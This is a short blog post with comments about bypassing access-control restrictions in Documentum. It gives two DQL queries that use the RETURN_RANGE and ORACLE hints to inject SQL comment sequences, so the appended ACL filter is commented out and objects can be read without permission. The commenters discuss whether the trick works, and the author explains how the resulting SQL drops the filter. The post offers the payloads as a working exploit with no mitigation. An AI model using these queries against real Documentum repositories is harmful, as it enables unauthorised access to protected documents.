documentum security vulnerabilities: bypassing acl restrictions

1. RETURN_RANGE hint:

select r_object_id, object_name from dm_sysobject 
ENABLE (RETURN_RANGE 1 10 'r_object_id) from dm_sysobject_s dm_sysobject) --')

2. ORACLE hint:

select r_object_id, object_name from dm_sysobject 
ENABLE (oracle('*/ r_object_id, object_name from dm_sysobject_s --'))

4 thoughts on “documentum security vulnerabilities: bypassing acl restrictions

  1. Both queries are not bypassing ACL security on my system. Both SQL statements contain the where-clauses to restrict to the acl.

    Env:
    6.7.0080.0269 Win32.Oracle

    Like

  2. Jens,

    I’m sure your queries contain ACL tail, but the problem is Oracle ignores it because that tail is commented out. For example resulting SQL query in 2nd case will look like:

    select /*+ */ r_object_id, object_name from dm_sysobject_s –*/ all dm_sysobject.r_object_id …

    and Oracle ignores all that follows ‘–*/’.

    Like

  3. Pingback: Plagiarism | Documentum in a (nuts)HELL
  4. Pingback: documentum security vulnerabilities: ENUMERATE RPC | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s